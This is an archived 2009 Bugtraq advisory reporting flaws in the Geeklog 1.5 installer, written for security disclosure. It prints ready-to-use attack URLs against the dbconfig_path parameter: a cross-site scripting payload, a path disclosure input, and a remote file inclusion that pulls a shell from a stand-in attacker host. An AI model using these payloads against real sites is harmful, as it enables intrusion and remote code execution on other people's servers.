lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 3 Jun 2009 15:51:37 -0600 From: security@...ern0t.net To: bugtraq@...urityfocus.com Subject: [InterN0T] Geeklog 1.5 - Pre-Installation Vulnerabilities Geeklog - Pre-Installation Vulnerabilities Version Affected: 1.5.2sr4 (18th April 2009) (newest) Info: See website for more details. Opinion: The system seems to be more secure than most web application systems on the Internet these days. Credits: InterN0T External Links: http://www.geeklog.net/ -:: The Advisory ::- Vulnerable Function / ID Calls: dbconfig_path, contains multiple bugs that can be used to perform: XSS, RFI and Path Disclosure. Cross Site Scripting: http://www.website.tld/geeklog/public_html/admin/install/index.php?mode="><script>alert(0)</script>dbconfig_path="><script>alert(0)</script> Path Disclosure: http://www.website.tld/geeklog/public_html/admin/install/index.php?mode='&dbconfig_path=' Remote File Inclusion: http://www.website.tld/geeklog/public_html/admin/install/index.php?mode='&dbconfig_path=http://www.evilsite.tld/shell.txt? -:: Solution ::- I didn't bother to find one, sorry. Reference: http://forum.intern0t.net/intern0t-advisories/1083-intern0t-geeklog-1-5-pre-installation-vulnerabilities.html Disclosure Information: - Vulnerabilities found and confirmed between 1st and 3rd June 2009. - Published at InterN0T the 3rd June 2009. - Bugtraq contacted the 3rd June 2009. All of the best, MaXe
Powered by blists - more mailing lists